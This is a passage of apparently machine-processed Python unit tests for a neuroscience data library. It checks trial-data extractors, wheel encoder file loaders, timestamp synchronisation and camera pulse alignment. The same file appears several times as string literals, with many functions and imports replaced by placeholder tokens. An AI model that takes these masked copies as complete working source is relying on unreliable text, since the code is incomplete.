self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = 